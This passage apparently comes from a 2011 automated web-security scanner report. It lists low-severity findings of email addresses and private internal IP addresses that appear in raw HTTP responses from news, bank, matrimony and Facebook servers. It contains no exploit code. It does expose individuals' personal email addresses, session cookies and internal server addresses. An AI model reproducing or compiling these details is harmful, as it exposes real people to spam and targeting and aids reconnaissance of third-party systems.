<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en" dir="ltr">
<head>
       <title>City of Modesto - 404 - File Not Found</title>
       <!--include
...[SNIP]...
<a href="mailto:webmaster@modestogov.com">
       webmaster@modestogov.com</a>
...[SNIP]...

25.76. http://www.mumbaimirror.com/index.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mumbaimirror.com
Path:   /index.aspx

Issue detail

The following email addresses were disclosed in the response:

Request

GET /index.aspx HTTP/1.1
Host: www.mumbaimirror.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 04 Sep 2011 05:16:41 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Powered-By: UrlRewriter.NET 2.0.0
Cache-Control: private
Expires: Sun, 04 Sep 2011 05:15:39 GMT
Content-Type: text/html
Content-Length: 143494


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Cont
...[SNIP]...
<a href="mailto:sureshruparel@yahoo.com"><font color="#cc0000">sureshruparel@yahoo.com</font>
...[SNIP]...
<a href="mailto:ram@gmail.com"><font color="#cc0000">ram@gmail.com</font>
...[SNIP]...
<a href="mailto:srinivasa.chakravarthy@rediffmail.com"><font color="#cc0000">srinivasa.chakravarthy@rediffmail.com</font>
...[SNIP]...
<a href="mailto:sanjeevtepl@gmail.com"><font color="#cc0000">sanjeevtepl@gmail.com</font>
...[SNIP]...
<a href="mailto:anilchandran1974@yahoo.com"><font color="#cc0000">anilchandran1974@yahoo.com</font>
...[SNIP]...
<a href="mailto:sushil56@yahoo.com"><font color="#cc0000">sushil56@yahoo.com</font>
...[SNIP]...
<a href="mailto:yadav_ramesh31@yahoo.com"><font color="#cc0000">yadav_ramesh31@yahoo.com</font>
...[SNIP]...
<a href="mailto:anoopk3r@yahoo.co.in"><font color="#cc0000">anoopk3r@yahoo.co.in</font>
...[SNIP]...
<a href="mailto:d.keshav32@yahoo.com"><font color="#cc0000">d.keshav32@yahoo.com</font>
...[SNIP]...
<a href="mailto:kmewad@yahoo.in"><font color="#cc0000">kmewad@yahoo.in</font>
...[SNIP]...
<a href="mailto:george.fernandes@accenture.com"><font color="#cc0000">george.fernandes@accenture.com</font>
...[SNIP]...
<a href="mailto:123bhkmumbai@gmail.com"><font color="#cc0000">123bhkmumbai@gmail.com</font>
...[SNIP]...
<a href="mailto:khanindas1@rediffmail.com"><font color="#cc0000">khanindas1@rediffmail.com</font>
...[SNIP]...
<a href="mailto:c-babu@hotmail.com"><font color="#cc0000">c-babu@hotmail.com</font>
...[SNIP]...
<a href="mailto:iwasfired@gmail.com"><font color="#cc0000">iwasfired@gmail.com</font>
...[SNIP]...
<a href="mailto:Mehrj1984@gmail.com"><font color="#cc0000">Mehrj1984@gmail.com</font>
...[SNIP]...
<a href="mailto:allthebest@gmail.com"><font color="#cc0000">allthebest@gmail.com</font>
...[SNIP]...
<a href="mailto:asdf@earthlink.net"><font color="#cc0000">asdf@earthlink.net</font>
...[SNIP]...
<a href="mailto:talk2prasanna@gmail.com"><font color="#cc0000">talk2prasanna@gmail.com</font>
...[SNIP]...

25.77. http://www.nationmultimedia.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nationmultimedia.com
Path:   /

Issue detail

The following email address was disclosed in the response:

Request

GET / HTTP/1.1
Host: www.nationmultimedia.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=bangkok+thailand+news
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 02:25:02 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
_onnection: close
Content-Type: text/html; charset=UTF-8
Proxy-Connection: Keep-Alive
Content-Length: 68597


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-us" lang="en-us
...[SNIP]...
<a href="mailto:customer@nationgroup.com">customer@nationgroup.com</a>
...[SNIP]...

25.78. http://www.nationmultimedia.com/breakingnews/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nationmultimedia.com
Path:   /breakingnews/

Issue detail

The following email address was disclosed in the response:

Request

GET /breakingnews/ HTTP/1.1
Host: www.nationmultimedia.com
Proxy-Connection: keep-alive
Referer: http://www.nationmultimedia.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=6b591benlha9rn9pn0k2tvnef6; _em_sv=-1; _cbclose=1; _cbclose32539=1; _uid32539=8467E527.1; _ctout32539=1; verify=test; _em_vt=f3e151deb3caa78de189b9e202024e62e18088e413-981323754e62e180; _em_v=8f239a6b9fac654b50350d7277324e62e18088e4f8-084548474e62e180; _em_hl=1; __utma=113213211.1779481420.1315103161.1315103161.1315103161.1; __utmb=113213211.1.10.1315103165; __utmc=113213211; __utmz=113213211.1315103165.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=bangkok%20thailand%20news; _pk_ref..5669=%5B%22%22%2C%22%22%2C1315103167%2C%22http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dbangkok%2Bthailand%2Bnews%22%5D; _pk_id..5669=a4f1af5acb69be64.1315103167.1.1315103167.1315103167.; _pk_ses..5669=*

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 02:46:31 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
_onnection: close
Content-Type: text/html; charset=UTF-8
Proxy-Connection: Keep-Alive
Content-Length: 34286

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<a href="mailto:customer@nationgroup.com">customer@nationgroup.com</a>
...[SNIP]...

25.79. http://www.nationmultimedia.com/home/Music-to-calm-the-savage-diplomatic-beast-US-band--30164372.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nationmultimedia.com
Path:   /home/Music-to-calm-the-savage-diplomatic-beast-US-band--30164372.html

Issue detail

The following email address was disclosed in the response:

Request

GET /home/Music-to-calm-the-savage-diplomatic-beast-US-band--30164372.html HTTP/1.1
Host: www.nationmultimedia.com
Proxy-Connection: keep-alive
Referer: http://www.nationmultimedia.com/breakingnews/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=6b591benlha9rn9pn0k2tvnef6; _em_sv=-1; _cbclose32539=1; _uid32539=8467E527.1; verify=test; _pk_ref..5669=%5B%22%22%2C%22%22%2C1315103167%2C%22http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dbangkok%2Bthailand%2Bnews%22%5D; _cbclose=1; _ctout32539=1; _em_hl=1; _em_vt=ee11f5b4b737c3323629b9e202024e62e18088e413-981323754e62e1f6; _em_v=1fc94de23a9888bf29e50d7277324e62e18088e4f8-084548474e62e1f6; __utma=113213211.1779481420.1315103161.1315103161.1315103161.1; __utmb=113213211.2.10.1315103165; __utmc=113213211; __utmz=113213211.1315103165.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=bangkok%20thailand%20news; _pk_id..5669=a4f1af5acb69be64.1315103167.1.1315103271.1315103167.; _pk_ses..5669=*

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 03:39:16 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
_onnection: close
Content-Type: text/html; charset=UTF-8
Proxy-Connection: Keep-Alive
Content-Length: 24549

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<a href="mailto:customer@nationgroup.com">customer@nationgroup.com</a>
...[SNIP]...

25.80. http://www.nationmultimedia.com/home/twitter-api/widget.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nationmultimedia.com
Path:   /home/twitter-api/widget.js

Issue detail

The following email address was disclosed in the response:

Request

GET /home/twitter-api/widget.js HTTP/1.1
Host: www.nationmultimedia.com
Proxy-Connection: keep-alive
Referer: http://www.nationmultimedia.com/home/twitter-api/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=6b591benlha9rn9pn0k2tvnef6; _em_sv=-1; _cbclose=1; _cbclose32539=1; _uid32539=8467E527.1; _ctout32539=1; verify=test; _em_vt=f3e151deb3caa78de189b9e202024e62e18088e413-981323754e62e180; _em_v=8f239a6b9fac654b50350d7277324e62e18088e4f8-084548474e62e180; _em_hl=1

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 02:25:15 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Mon, 29 Nov 2010 06:31:21 GMT
ETag: "338a91-74fd-3868e040"
Accept-Ranges: bytes
_ontent-Length: 29949
_onnection: close
Content-Type: application/x-javascript
Proxy-Connection: Keep-Alive
Content-Length: 29949

/**
* Twitter - http://twitter.com
* Copyright (C) 2010 Twitter
* Author: Dustin Diaz (dustin@twitter.com)
*
* V 2.2.5 Twitter search/profile/faves/list widget
* http://twitter.com/widgets
* For full documented source see http://twitter.com/javascripts/widgets/widget.js
* Hosting and modificatio
...[SNIP]...

25.81. http://www.nationmultimedia.com/national/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nationmultimedia.com
Path:   /national/

Issue detail

The following email address was disclosed in the response:

Request

GET /national/ HTTP/1.1
Host: www.nationmultimedia.com
Proxy-Connection: keep-alive
Referer: http://www.nationmultimedia.com/breakingnews/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=6b591benlha9rn9pn0k2tvnef6; _em_sv=-1; _cbclose32539=1; _uid32539=8467E527.1; verify=test; _pk_ref..5669=%5B%22%22%2C%22%22%2C1315103167%2C%22http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dbangkok%2Bthailand%2Bnews%22%5D; _cbclose=1; _ctout32539=1; _em_hl=1; _em_vt=ee11f5b4b737c3323629b9e202024e62e18088e413-981323754e62e1f6; _em_v=1fc94de23a9888bf29e50d7277324e62e18088e4f8-084548474e62e1f6; __utma=113213211.1779481420.1315103161.1315103161.1315103161.1; __utmb=113213211.2.10.1315103165; __utmc=113213211; __utmz=113213211.1315103165.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=bangkok%20thailand%20news; _pk_id..5669=a4f1af5acb69be64.1315103167.1.1315103271.1315103167.; _pk_ses..5669=*

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 03:39:58 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
_onnection: close
Content-Type: text/html; charset=UTF-8
Proxy-Connection: Keep-Alive
Content-Length: 37601

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<a href="mailto:customer@nationgroup.com">customer@nationgroup.com</a>
...[SNIP]...

25.82. http://www.nationmultimedia.com/specials/nationphoto/show.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nationmultimedia.com
Path:   /specials/nationphoto/show.php

Issue detail

The following email address was disclosed in the response:

Request

GET /specials/nationphoto/show.php HTTP/1.1
Host: www.nationmultimedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 04:41:47 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13706

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<title>Thailand pictures , news in pictures , photo in Thail
...[SNIP]...
<a href="mailto:customer@nationgroup.com">customer@nationgroup.com</a>
...[SNIP]...

25.83. http://www.nationmultimedia.com/specials/nationvdo/showvdo.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nationmultimedia.com
Path:   /specials/nationvdo/showvdo.php

Issue detail

The following email address was disclosed in the response:

Request

GET /specials/nationvdo/showvdo.php HTTP/1.1
Host: www.nationmultimedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 04:41:12 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 15376

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
<a href="mailto:customer@nationgroup.com">customer@nationgroup.com</a>
...[SNIP]...

25.84. http://www.scb.co.th/scb_api/scbapi.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.scb.co.th
Path:   /scb_api/scbapi.jsp

Issue detail

The following email address was disclosed in the response:

Request

GET /scb_api/scbapi.jsp HTTP/1.1
Host: www.scb.co.th
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 04:44:12 GMT
Server: Apache
Set-Cookie: JSESSIONID=506AC7D9B20E047914172BF58F3ADD3C; Path=/scb_api
Content-Length: 3404
Connection: close
Content-Type: text/html;charset=tis-620


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Co
...[SNIP]...
<br />
Webadmin@scb.co.th
<br />
...[SNIP]...

25.85. http://www.simplymarry.com/timesmatri/faces/jsp/profileDisplay.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.simplymarry.com
Path:   /timesmatri/faces/jsp/profileDisplay.jsp

Issue detail

The following email addresses were disclosed in the response:

Request

GET /timesmatri/faces/jsp/profileDisplay.jsp HTTP/1.1
Host: www.simplymarry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 04:44:07 GMT
Server: Apache/2.2.17 (Unix) DAV/2 mod_jk/1.2.31
X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP01 (build: SVNTag=JBPAPP_4_3_0_GA_CP01 date=200804211746)/Tomcat-5.5
Set-Cookie: JSESSIONID=EFF5BB51C08EA6B27EE4AEDFB0BC3E32.SMAPP03; Path=/
Content-Language: en
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 42075


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml
...[SNIP]...
<a href="mailto:support@simplymarry.com" target="_blank">support@simplymarry.com </a>
...[SNIP]...
<a href="mailto:simplymarryphotos@timesgroup.com" target="_blank">simplymarryphotos@timesgroup.com</a>
...[SNIP]...

25.86. http://www.tmd.go.th/en/province.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tmd.go.th
Path:   /en/province.php

Issue detail

The following email address was disclosed in the response:

Request

GET /en/province.php HTTP/1.1
Host: www.tmd.go.th
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=tis-620
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.3.6
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 04:45:20 GMT
Connection: close
Content-Length: 26227


<HTML>
<HEAD>
<TITLE>Thai Meteorological Department - Bangkok Weather</TITLE>
<meta name="description" content="Bangkok, Bangkok Forecast Weather, BANGKOK METROPOLIS">
<META NAME="keywords"
...[SNIP]...
<TD>&nbsp;&nbsp;Contact web master at webmaster@tmd.go.th</TD>
...[SNIP]...

26. Private IP addresses disclosed  previous  next
There are 60 instances of this issue:

Issue background

RFC 1918 specifies ranges of IP addresses that are reserved for use in private networks and cannot be routed on the public Internet. Although various methods exist by which an attacker can determine the public IP addresses in use by an organisation, the private addresses used internally cannot usually be determined in the same ways.

Discovering the private addresses used within an organisation can help an attacker in carrying out network-layer attacks aiming to penetrate the organisation's internal infrastructure.

Issue remediation

There is not usually any good reason to disclose the internal IP addresses used within an organisation's infrastructure. If these are being returned in service banners or debug messages, then the relevant services should be configured to mask the private addresses. If they are being used to track back-end servers for load balancing purposes, then the addresses should be rewritten with innocuous identifiers from which an attacker cannot infer any useful information about the infrastructure.


26.1. http://ad4.liverail.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad4.liverail.com
Path:   /

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET / HTTP/1.1
Host: ad4.liverail.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Pragma: no-cache
Expires: Tue, 29 May 1984 15:00:00 GMT
Content-type: text/xml; charset=UTF-8
Connection: close
Date: Sun, 04 Sep 2011 04:06:38 GMT
Server: lighttpd/1.4.28
Content-Length: 166

<?xml version="1.0" encoding="utf-8"?>
<liverail content='error' version='3.0-10.166.245.147'><message>Publisher ID missing (/0//10.166.245.147/)</message></liverail>

26.2. http://ad4.liverail.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad4.liverail.com
Path:   /

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

POST / HTTP/1.1
Host: ad4.liverail.com
Proxy-Connection: keep-alive
Referer: http://static.eplayer.performgroup.com/ptvFlash/eplayer2/Eplayer.swf
Content-Length: 944
Origin: http://adstil.indiatimes.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
content-type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

LR%5FPUBLISHER%5FID=2443&LR%5FTITLE=08%2F31%2F11%3A%20The%20Daily&LR%5FHEIGHT=250&LR%5FOASX%5F1708%5FPOSITION=x40&LR%5FPARTNERS=13911&LR%5FWIDTH=300&LR%5FLAYOUT%5FLINEAR%5FKEEPASPECTRATIO=false&LR%5FT
...[SNIP]...

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Pragma: no-cache
Expires: Tue, 29 May 1984 15:00:00 GMT
Content-type: text/xml; charset=UTF-8
Connection: close
Date: Sun, 04 Sep 2011 03:18:33 GMT
Server: lighttpd/1.4.28
Content-Length: 3825

<?xml version="1.0" encoding="utf-8"?>
<liverail content="sources" version="4.2.2-2" srv="10.160.243.111">
   <sources>
       <source dpt="1" oid="" olid="" pid="2443" cid="1300" nid="2443" asp="3.00:3.00
...[SNIP]...

26.3. http://ad4.liverail.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad4.liverail.com
Path:   /

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

POST /?compressed HTTP/1.1
Host: ad4.liverail.com
Proxy-Connection: keep-alive
Referer: http://static.eplayer.performgroup.com/ptvFlash/eplayer2/Eplayer.swf
Content-Length: 3685
Origin: http://adstil.indiatimes.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
content-type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lr_uid=17200647

x...Y{.8..$...x.....L...N..Q..0m..8.....0..I...=;._.C!.JuK.*...:._.s..X3.eTy.. p.(.4..(    b..,.=I..|..NxZ)U..=.c...^......Ex_..    ...    ...JWy.fq*...50xP.
Z..~...z...n..i....b..$3].C..,.T-.!.........*;...
...[SNIP]...

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Pragma: no-cache
Expires: Tue, 29 May 1984 15:00:00 GMT
Content-type: text/xml; charset=UTF-8
Connection: close
Date: Sun, 04 Sep 2011 03:20:04 GMT
Server: lighttpd/1.4.28
Content-Length: 20779

<?xml version="1.0" encoding="utf-8"?>
<liverail content="ads" version="4.2.2-2" srv="10.166.234.137">
<setup>
<playerskin>
<url><![CDATA[http://vox-static.liverail.com/swf/
...[SNIP]...

26.4. http://api.facebook.com/restserver.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://api.facebook.com
Path:   /restserver.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /restserver.php?v=1.0&method=links.getStats&urls=%5B%22http%3A%2F%2Ftimesofindia.indiatimes.com%2Fcity%2Fmumbai%2FMy-friend-Ganesha%2Farticleshow%2F9855193.cms%22%5D&format=json&callback=fb_sharepro_render HTTP/1.1
Host: api.facebook.com
Proxy-Connection: keep-alive
Referer: http://timesofindia.indiatimes.com/newtoolbar/9855193.cms?args=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=120
Content-Type: text/javascript;charset=utf-8
Expires: Sat, 03 Sep 2011 20:10:02 -0700
Pragma:
X-FB-Rev: 434551
X-FB-Server: 10.54.113.44
X-Cnection: close
Date: Sun, 04 Sep 2011 03:08:02 GMT
Content-Length: 367

fb_sharepro_render([{"url":"http:\/\/timesofindia.indiatimes.com\/city\/mumbai\/My-friend-Ganesha\/articleshow\/9855193.cms","normalized_url":"http:\/\/timesofindia.indiatimes.com\/city\/mumbai\/My-fr
...[SNIP]...

26.5. http://api.facebook.com/restserver.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://api.facebook.com
Path:   /restserver.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /restserver.php?v=1.0&method=links.getStats&urls=%5B%22http%3A%2F%2Fwww.dnaindia.com%2Fsport%2Freport_sachin-tendulkar-s-toe-injury-flares-up-to-meet-surgeon_1582811%22%5D&format=json&callback=fb_sharepro_render HTTP/1.1
Host: api.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.dnaindia.com/sport/report_sachin-tendulkar-s-toe-injury-flares-up-to-meet-surgeon_1582811
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=120
Content-Type: text/javascript;charset=utf-8
Expires: Sat, 03 Sep 2011 19:29:33 -0700
Pragma:
X-FB-Rev: 434551
X-FB-Server: 10.54.133.54
X-Cnection: close
Date: Sun, 04 Sep 2011 02:27:33 GMT
Content-Length: 385

fb_sharepro_render([{"url":"http:\/\/www.dnaindia.com\/sport\/report_sachin-tendulkar-s-toe-injury-flares-up-to-meet-surgeon_1582811","normalized_url":"http:\/\/www.dnaindia.com\/sport\/report_sachin-
...[SNIP]...

26.6. http://api.facebook.com/restserver.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://api.facebook.com
Path:   /restserver.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /restserver.php HTTP/1.1
Host: api.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Disposition: attachment
Content-Type: text/xml;charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Rev: 434551
X-UA-Compatible: IE=edge
X-FB-Server: 10.62.234.57
Connection: close
Date: Sun, 04 Sep 2011 04:12:12 GMT
Content-Length: 325

<?xml version="1.0" encoding="UTF-8"?>
<error_response xmlns="http://api.facebook.com/1.0/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://api.facebook.com/1.0/ http:
...[SNIP]...

26.7. http://api.facebook.com/restserver.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://api.facebook.com
Path:   /restserver.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /restserver.php?v=1.0&method=links.getStats&urls=%5B%22http%3A%2F%2Fwww.dnaindia.com%2Fsport%2Freport_sachin-tendulkar-s-toe-injury-flares-up-to-meet-surgeon_1582811%22%2C%22http%3A%2F%2Fwww.dnaindia.com%2Fsport%2Freport_sachin-tendulkar-s-toe-injury-flares-up-to-meet-surgeon_1582811%22%5D&format=json&callback=fb_sharepro_render HTTP/1.1
Host: api.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.dnaindia.com/sport/report_sachin-tendulkar-s-toe-injury-flares-up-to-meet-surgeon_1582811
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
